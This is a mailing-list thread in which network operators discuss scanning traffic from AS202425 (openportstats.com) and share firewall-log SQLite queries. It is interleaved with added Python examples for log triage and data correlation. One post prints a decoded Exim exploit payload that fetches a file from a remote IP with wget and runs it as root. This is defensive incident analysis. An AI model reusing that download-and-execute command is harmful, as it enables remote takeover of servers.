Re: Russian Anal Probing + Malware
In message , "Keith Medcalf" wrote:

> On Friday, 21 June, 2019 18:14, Ronald F. Guilmette wrote:
>
> >https://twitter.com/GreyNoiseIO/status/1129017971135995904
> >https://twitter.com/JayTHL/status/1128718224965685248
>
> Sorry, don't twitter ... Too much malicious JavaScript there.

Can you be more, um, specific?

> >80.82.64.21 scanner29.openportstats.com
> >...
>
> Why do you think it is a problem and not just run-of-the-mill background
> radiation on the Internet?

It's not a problem for me personally... other than the fact that these
goofballs are filling up my log files to no good end. I just wanted
others to be aware of this (apparently ongoing) garbage. And I wouldn't
want anyone to be fooled by the mere fact that this openportstats.com
domain has a sort-of web site. It's still 100% illegitimate.

> Do you (or your endpoints) not have a firewall to block such things?

I do, and I hope everyone else does also.

> What malware slinging? I see none of that.

You didn't look at the Twitter reports.

> >https://bit.ly/2ZBayc4
>
> Malicious link detected.

If you say so. (It's actually just a cute picture.)

Regards,
rfg
Re: Russian Anal Probing + Malware
Hello,

On Sat, Jun 22, 2019 at 11:01:13AM -0600, Keith Medcalf wrote:
> What malware slinging?

Some user there is trying to exploit CVE-2018-10149:

2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:" H=(myhostname) [89.248.171.57] next input="QUIT\n"

Plus another 17 attempts by that IP through to 19 June.

$ printf "\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22\n"
/bin/sh -c "wget --no-check-certificate -T 36 hxxps://185.162.235.211/ldm1ip -O /root/.yyearz && sh /root/.yyearz -n &"

(I replaced https with hxxps to prevent auto-link-followers from hitting the site.)

Cheers,
Andy
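Andy's triage above was done by hand: grep the Exim mainlog for "SMTP protocol synchronization error", count the attempts from one address, and feed the \xNN-escaped payload through printf so it can be read, then defang the URL before posting. The script below is an added example of doing the same three steps in one place; it is not part of the thread and not Exim's or anyone's project code. The log lines and the escaped payload are constructed samples (the payload points at a documentation address, 192.0.2.10), and the function names are hypothetical.

```python
"""Triage Exim synchronization-error lines and decode escaped payloads.

Added example; constructed sample data, hypothetical helper names.
"""
import re
from collections import Counter

# Constructed sample Exim mainlog excerpt. The first source address is the one
# reported in the thread; the other addresses are documentation ranges.
SAMPLE_LOG = r"""
2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:" H=(myhostname) [89.248.171.57] next input="QUIT\n"
2019-06-12 03:02:10 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:" H=(myhostname) [89.248.171.57] next input="QUIT\n"
2019-06-12 09:45:01 <= alice@example.org H=mail.example.org [192.0.2.5] P=esmtps S=1337
2019-06-13 22:11:48 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:" H=(myhostname) [198.51.100.77] next input="QUIT\n"
"""

# Constructed \xNN-escaped payload of the kind Andy decoded with printf.
SAMPLE_PAYLOAD = r'wget\x20https\x3a\x2f\x2f192\x2e0\x2e2\x2e10\x2fstage1\n'

SYNC_ERR = re.compile(
    r'^(?P<ts>\S+ \S+) SMTP protocol synchronization error .*?'
    r'\[(?P<ip>[0-9.]+)\] next input="(?P<next>[^"]*)"'
)


def sync_errors(log_text):
    """Return (timestamp, source ip, next input) for each sync-error line."""
    hits = []
    for line in log_text.splitlines():
        m = SYNC_ERR.match(line)
        if m:
            hits.append((m['ts'], m['ip'], m['next']))
    return hits


def attempts_per_ip(log_text):
    """Count sync errors per source address (Andy's '17 attempts' figure)."""
    return Counter(ip for _, ip, _ in sync_errors(log_text))


def decode_hex_escapes(escaped):
    """Turn a \\xNN-escaped string, as fed to printf in the post, into text."""
    return bytes(escaped, 'ascii').decode('unicode_escape')


def defang(text):
    """Make URLs and dotted IPs non-clickable, as the post did with hxxps."""
    text = re.sub(r'\bhttps?://',
                  lambda m: m.group(0).replace('http', 'hxxp'), text)
    text = re.sub(r'\b(\d{1,3}\.\d{1,3}\.\d{1,3})\.(\d{1,3})\b',
                  r'\1[.]\2', text)
    return text


def triage_payload(escaped):
    """Decode and defang in one step, ready to paste into a report."""
    return defang(decode_hex_escapes(escaped)).rstrip('\n')


if __name__ == '__main__':
    for ip, n in attempts_per_ip(SAMPLE_LOG).most_common():
        print(f'{ip:16} {n} sync-error rejections')
    print(triage_payload(SAMPLE_PAYLOAD))
```

The decoder relies on Python's `unicode_escape` codec, which understands the same `\xNN` and `\n` escapes that printf does; the defang step is applied only to the decoded payload, never to the log lines, so timestamps and host addresses in the log stay searchable.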
Re: Russian Anal Probing + Malware
On 6/22/19 2:13 AM, Ronald F. Guilmette wrote:
> https://twitter.com/GreyNoiseIO/status/1129017971135995904
> https://twitter.com/JayTHL/status/1128718224965685248
>
> Friday Questionnaire:
>
> Is there anybody on this list who keeps firewall logs and who
> DOESN'T have numerous hits recorded therein from one or more
> of the following IP addresses?
>
> 80.82.64.21 scanner29.openportstats.com
> 80.82.70.2 scanner8.openportstats.com
> 80.82.70.198 scanner21.openportstats.com
> 80.82.70.216 scanner13.openportstats.com
> 80.82.78.104 scanner151.openportstats.com
> 89.248.160.132 scanner15.openportstats.com
> 89.248.162.168 scanner5.openportstats.com
> 89.248.168.62 scanner1.openportstats.com
> 89.248.168.63 scanner2.openportstats.com
> 89.248.168.73 scanner3.openportstats.com
> 89.248.168.74 scanner4.openportstats.com
> 89.248.168.170 scanner17.openportstats.com
> 89.248.168.196 scanner16.openportstats.com
> 89.248.171.38 scanner7.openportstats.com
> 89.248.171.57 scanner20.openportstats.com
> 89.248.172.18 scanner25.openportstats.com
> 89.248.172.23 scanner27.openportstats.com
> 93.174.91.31 scanner10.openportstats.com
> 93.174.91.34 scanner11.openportstats.com
> 93.174.91.35 scanner12.openportstats.com
> 93.174.93.98 scanner18.openportstats.com
> 93.174.93.149 scanner6.openportstats.com
> 93.174.93.241 scanner14.openportstats.com
> 93.174.95.37 scanner19.openportstats.com
> 93.174.95.42 scanner8.openportstats.com
> 94.102.51.31 scanner31.openportstats.com
> 94.102.51.98 scanner55.openportstats.com
> 94.102.52.245 scanner9.openportstats.com
>
> NOTE: Dshield has already assigned an 8 rating on their Badness Richter
> Scale to the specific one of the above addresses that's been poking me
> personally in recent days:
>
> https://www.dshield.org/ipinfo.html?ip=89.248.162.168
> https://www.dshield.org/ipdetails.html?ip=89.248.162.168
>
> And the Dshield rating is *just* based on the probing. The addition of
> malware slinging also puts this whole mess over the top entirely.
>
> Oh! And I'll save you all the time looking it up. 100% of the IPs listed
> above are on AS202425 "IP Volume, Inc." allegedly of the Seychelles
> Islands, where the employees and management are no doubt enjoying their
> luxurious and expansive new corporate headquarters...

It's just a port/vulnerability scanner, I really don't see anything special
about this particular case. "IP Volume" is actually a new brand of
Ecatel/Quasi Networks, servers are in a Dutch datacenter.

> P.S. This is the kind of thing that everybody really should expect when
> the U.S. Department of Defense takes it upon itself to start up its own
> little private and unauthorized (cyber)war on Russia, without first
> obtaining the consent of Congress... you know, kinda like that ancient
> yellowed document that nobody in this country reads anymore says they
> should. And apparently, the DoD was understandably not anxious to brief
> even the President about all this...
>
> https://www.businessinsider.com/us-officials-hide-russia-cyber-operation-trump-2019-6
>
> (Not that anybody can really blame them for THAT.)

What does that have to do with the vulnerability scanner?

Also: You know it doesn't make any sense, right?

-- 
Filip Hruska
Linux System Administrator
Re: Russian Anal Probing + Malware
AS202425 = AS29073. Formerly known as Quasi Networks / Ecatel.

See previous NANOG thread here:
https://mailman.nanog.org/pipermail/nanog/2017-August/091956.html

On Sat, Jun 22, 2019 at 10:03 AM Keith Medcalf wrote:

> On Friday, 21 June, 2019 18:14, Ronald F. Guilmette wrote:
>
> >https://twitter.com/GreyNoiseIO/status/1129017971135995904
> >https://twitter.com/JayTHL/status/1128718224965685248
>
> Sorry, don't twitter ... Too much malicious JavaScript there.
>
> >Friday Questionnaire:
>
> >Is there anybody on this list who keeps firewall logs and who
> >DOESN'T have numerous hits recorded therein from one or more
> >of the following IP addresses?
>
> >80.82.64.21 scanner29.openportstats.com
> >80.82.70.2 scanner8.openportstats.com
> >80.82.70.198 scanner21.openportstats.com
> >80.82.70.216 scanner13.openportstats.com
> >80.82.78.104 scanner151.openportstats.com
> >89.248.160.132 scanner15.openportstats.com
> >89.248.162.168 scanner5.openportstats.com
> >89.248.168.62 scanner1.openportstats.com
> >89.248.168.63 scanner2.openportstats.com
> >89.248.168.73 scanner3.openportstats.com
> >89.248.168.74 scanner4.openportstats.com
> >89.248.168.170 scanner17.openportstats.com
> >89.248.168.196 scanner16.openportstats.com
> >89.248.171.38 scanner7.openportstats.com
> >89.248.171.57 scanner20.openportstats.com
> >89.248.172.18 scanner25.openportstats.com
> >89.248.172.23 scanner27.openportstats.com
> >93.174.91.31 scanner10.openportstats.com
> >93.174.91.34 scanner11.openportstats.com
> >93.174.91.35 scanner12.openportstats.com
> >93.174.93.98 scanner18.openportstats.com
> >93.174.93.149 scanner6.openportstats.com
> >93.174.93.241 scanner14.openportstats.com
> >93.174.95.37 scanner19.openportstats.com
> >93.174.95.42 scanner8.openportstats.com
> >94.102.51.31 scanner31.openportstats.com
> >94.102.51.98 scanner55.openportstats.com
> >94.102.52.245 scanner9.openportstats.com
>
> I have just a few. They have all been blocked. There have been no
> incoming sessions established, nor any outbound sessions to these addresses.
>
> Why do you think it is a problem and not just run-of-the-mill background
> radiation on the Internet?
>
> Do you (or your endpoints) not have a firewall to block such things?
>
> sqlite> select * from hosts where name like '%openports%';
> id      address        name                          description  asn     lastupdate
> ------  -------------  ----------------------------  -----------  ------  ----------
> 3662    93.174.93.241  scanner14.openportstats.com.               202425  1561209704
> 5061    93.174.95.42   scanner8.openportstats.com.                202425  1560718494
> 11894   93.174.93.149  scanner6.openportstats.com.                202425  1560732443
> 17720   93.174.93.98   scanner18.openportstats.com.               202425  1560640554
> 54208   80.82.70.2     scanner8.openportstats.com.                202425  1560774033
> 54790   89.248.160.13  scanner15.openportstats.com.               202425  1560682732
> 55081   89.248.168.19  scanner16.openportstats.com.               202425  1561158220
> 55629   89.248.168.17  scanner17.openportstats.com.               202425  1560817976
> 59858   89.248.171.57  scanner20.openportstats.com.               202425  1560800216
> 64626   89.248.171.38  scanner7.openportstats.com.                202425  1560841829
> 70081   93.174.95.37   scanner19.openportstats.com.               202425  1560802023
> 72978   80.82.70.216   scanner13.openportstats.com.               202425  1560709312
> 74711   94.102.52.245  scanner9.openportstats.com.                202425  1560589038
> 80358   89.248.162.16  scanner5.openportstats.com.                202425  1561217966
> 86148   89.248.172.18  scanner25.openportstats.com.               202425  1560884061
> 89484   94.102.51.31   scanner31.openportstats.com.               202425  1561199715
> 90131   80.82.70.198   scanner21.openportstats.com.               202425  1560776777
> 90531   80.82.78.104   scanner151.openportstats.com               202425  1561150052
> 91641   80.82.64.21    scanner29.openportstats.com.               202425  1561184548
> 104810  94.102.51.98   scanner55.openportstats.com.               202425  1561138118
>
> sqlite> select * from asns where asn=202425;
> asn     country  rir      allocated   description      lastupdate
> ------  -------  -------  ----------  ---------------  ----------
> 202425  SC       ripencc  2018-05-17  INT-NETWORK, SC  1561217966
>
> sqlite> select srcaddress, count(*), min(localtime), max(localtime) from
> firewalllog where srcaddress in (select address from hosts where name like
> '%openportstats.com.') group by srcaddress;
> srcaddress   count(*)  min(localtime)                  max(localtime)
> -----------  --------  ------------------------------  ------------------------------
> 80.82.64.21  6         2019-03-28 05:21:13.919 -06:00  2019-03-31 06:47:28.309 -06:00
> 80.82.70.2   208       2019-01-23 12:58:02.557 -07:00  2019-04-02 06:37:43.125 -06:00
>
RE: Russian Anal Probing + Malware
On Friday, 21 June, 2019 18:14, Ronald F. Guilmette wrote:

>https://twitter.com/GreyNoiseIO/status/1129017971135995904
>https://twitter.com/JayTHL/status/1128718224965685248

Sorry, don't twitter ... Too much malicious JavaScript there.

>Friday Questionnaire:

>Is there anybody on this list who keeps firewall logs and who
>DOESN'T have numerous hits recorded therein from one or more
>of the following IP addresses?

>80.82.64.21 scanner29.openportstats.com
>80.82.70.2 scanner8.openportstats.com
>80.82.70.198 scanner21.openportstats.com
>80.82.70.216 scanner13.openportstats.com
>80.82.78.104 scanner151.openportstats.com
>89.248.160.132 scanner15.openportstats.com
>89.248.162.168 scanner5.openportstats.com
>89.248.168.62 scanner1.openportstats.com
>89.248.168.63 scanner2.openportstats.com
>89.248.168.73 scanner3.openportstats.com
>89.248.168.74 scanner4.openportstats.com
>89.248.168.170 scanner17.openportstats.com
>89.248.168.196 scanner16.openportstats.com
>89.248.171.38 scanner7.openportstats.com
>89.248.171.57 scanner20.openportstats.com
>89.248.172.18 scanner25.openportstats.com
>89.248.172.23 scanner27.openportstats.com
>93.174.91.31 scanner10.openportstats.com
>93.174.91.34 scanner11.openportstats.com
>93.174.91.35 scanner12.openportstats.com
>93.174.93.98 scanner18.openportstats.com
>93.174.93.149 scanner6.openportstats.com
>93.174.93.241 scanner14.openportstats.com
>93.174.95.37 scanner19.openportstats.com
>93.174.95.42 scanner8.openportstats.com
>94.102.51.31 scanner31.openportstats.com
>94.102.51.98 scanner55.openportstats.com
>94.102.52.245 scanner9.openportstats.com

I have just a few. They have all been blocked. There have been no
incoming sessions established, nor any outbound sessions to these addresses.

Why do you think it is a problem and not just run-of-the-mill background
radiation on the Internet?

Do you (or your endpoints) not have a firewall to block such things?

sqlite> select * from hosts where name like '%openports%';
id      address        name                          description  asn     lastupdate
------  -------------  ----------------------------  -----------  ------  ----------
3662    93.174.93.241  scanner14.openportstats.com.               202425  1561209704
5061    93.174.95.42   scanner8.openportstats.com.                202425  1560718494
11894   93.174.93.149  scanner6.openportstats.com.                202425  1560732443
17720   93.174.93.98   scanner18.openportstats.com.               202425  1560640554
54208   80.82.70.2     scanner8.openportstats.com.                202425  1560774033
54790   89.248.160.13  scanner15.openportstats.com.               202425  1560682732
55081   89.248.168.19  scanner16.openportstats.com.               202425  1561158220
55629   89.248.168.17  scanner17.openportstats.com.               202425  1560817976
59858   89.248.171.57  scanner20.openportstats.com.               202425  1560800216
64626   89.248.171.38  scanner7.openportstats.com.                202425  1560841829
70081   93.174.95.37   scanner19.openportstats.com.               202425  1560802023
72978   80.82.70.216   scanner13.openportstats.com.               202425  1560709312
74711   94.102.52.245  scanner9.openportstats.com.                202425  1560589038
80358   89.248.162.16  scanner5.openportstats.com.                202425  1561217966
86148   89.248.172.18  scanner25.openportstats.com.               202425  1560884061
89484   94.102.51.31   scanner31.openportstats.com.               202425  1561199715
90131   80.82.70.198   scanner21.openportstats.com.               202425  1560776777
90531   80.82.78.104   scanner151.openportstats.com               202425  1561150052
91641   80.82.64.21    scanner29.openportstats.com.               202425  1561184548
104810  94.102.51.98   scanner55.openportstats.com.               202425  1561138118

sqlite> select * from asns where asn=202425;
asn     country  rir      allocated   description      lastupdate
------  -------  -------  ----------  ---------------  ----------
202425  SC       ripencc  2018-05-17  INT-NETWORK, SC  1561217966

sqlite> select srcaddress, count(*), min(localtime), max(localtime) from
firewalllog where srcaddress in (select address from hosts where name like
'%openportstats.com.') group by srcaddress;
srcaddress   count(*)  min(localtime)                  max(localtime)
-----------  --------  ------------------------------  ------------------------------
80.82.64.21  6         2019-03-28 05:21:13.919 -06:00  2019-03-31 06:47:28.309 -06:00
80.82.70.2   208       2019-01-23 12:58:02.557 -07:00  2019-04-02 06:37:43.125 -06:00
80.82.70.19  114       2019-03-25 14:13:17.058 -06:00  2019-04-02 06:39:57.214 -06:00
80.82.70.21  17970     2019-02-25
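Keith's three queries answer the thread's question from local data alone: a hosts table keyed by reverse-DNS name, an asns table, and the firewall log joined through the IN (...) subquery. The script below is an added example, not Keith's database or any project's code, that rebuilds that shape in an in-memory SQLite database so the queries can be run and extended. The table and column names follow the ones visible in his output; the dstport column, the row values, the hit counts and the timestamps are constructed (the scanner addresses, names and the ASN are taken from the thread, the 192.0.2.5 mail host and AS64496 are documentation placeholders). The function names are hypothetical.

```python
"""Correlate firewall-log sources with a reverse-DNS hosts table in SQLite.

Added example with constructed data; column names mirror the post's output,
the dstport column and all row values are assumptions.
"""
import sqlite3

SCHEMA = """
CREATE TABLE hosts (id INTEGER PRIMARY KEY, address TEXT, name TEXT,
                    description TEXT, asn INTEGER, lastupdate INTEGER);
CREATE TABLE asns (asn INTEGER PRIMARY KEY, country TEXT, rir TEXT,
                   allocated TEXT, description TEXT, lastupdate INTEGER);
CREATE TABLE firewalllog (srcaddress TEXT, dstport INTEGER, localtime TEXT);
"""

# Constructed rows. Names end in '.' because they come from rDNS as FQDNs,
# which is why the post's filter is LIKE '%openportstats.com.' with the dot.
HOSTS = [
    (3662, '93.174.93.241', 'scanner14.openportstats.com.', None, 202425, 1561209704),
    (54208, '80.82.70.2', 'scanner8.openportstats.com.', None, 202425, 1560774033),
    (91641, '80.82.64.21', 'scanner29.openportstats.com.', None, 202425, 1561184548),
    (99999, '192.0.2.5', 'mail.example.org.', None, 64496, 1561000000),
]
ASNS = [
    (202425, 'SC', 'ripencc', '2018-05-17', 'INT-NETWORK, SC', 1561217966),
    (64496, 'ZZ', 'example', '2019-01-01', 'EXAMPLE-NET', 1561000000),
]
FWLOG = [
    ('80.82.64.21', 22, '2019-03-28 05:21:13.919 -06:00'),
    ('80.82.64.21', 23, '2019-03-31 06:47:28.309 -06:00'),
    ('80.82.70.2', 445, '2019-01-23 12:58:02.557 -07:00'),
    ('80.82.70.2', 3389, '2019-02-10 01:00:00.000 -07:00'),
    ('80.82.70.2', 8080, '2019-04-02 06:37:43.125 -06:00'),
    ('192.0.2.5', 25, '2019-03-01 10:00:00.000 -07:00'),
]


def build_db():
    """Create the in-memory database and load the constructed rows."""
    con = sqlite3.connect(':memory:')
    con.executescript(SCHEMA)
    con.executemany('INSERT INTO hosts VALUES (?,?,?,?,?,?)', HOSTS)
    con.executemany('INSERT INTO asns VALUES (?,?,?,?,?,?)', ASNS)
    con.executemany('INSERT INTO firewalllog VALUES (?,?,?)', FWLOG)
    return con


def hits_by_scanner(con, suffix='%openportstats.com.'):
    """The post's third query: count and first/last seen per source address,
    restricted to addresses whose rDNS name matches the suffix."""
    sql = """SELECT srcaddress, COUNT(*), MIN(localtime), MAX(localtime)
             FROM firewalllog
             WHERE srcaddress IN (SELECT address FROM hosts WHERE name LIKE ?)
             GROUP BY srcaddress ORDER BY srcaddress"""
    return con.execute(sql, (suffix,)).fetchall()


def hits_by_asn(con):
    """Roll the same firewall hits up to the originating AS through hosts."""
    sql = """SELECT a.asn, a.description, COUNT(*)
             FROM firewalllog f
             JOIN hosts h ON h.address = f.srcaddress
             JOIN asns a ON a.asn = h.asn
             GROUP BY a.asn ORDER BY COUNT(*) DESC"""
    return con.execute(sql).fetchall()


def scanner_report():
    """Build the database and return (per-address rows, per-AS rows)."""
    con = build_db()
    return hits_by_scanner(con), hits_by_asn(con)


if __name__ == '__main__':
    by_addr, by_asn = scanner_report()
    for row in by_addr:
        print('%-14s %5d  %s  %s' % row)
    for asn, desc, n in by_asn:
        print('AS%d (%s): %d hits' % (asn, desc, n))
```

MIN and MAX work on the localtime column because the timestamps are stored as fixed-width ISO text, which sorts chronologically as long as every row carries the same offset format; the per-AS roll-up is the step that turns "a few scanner hosts" into the single-origin picture the thread argues about.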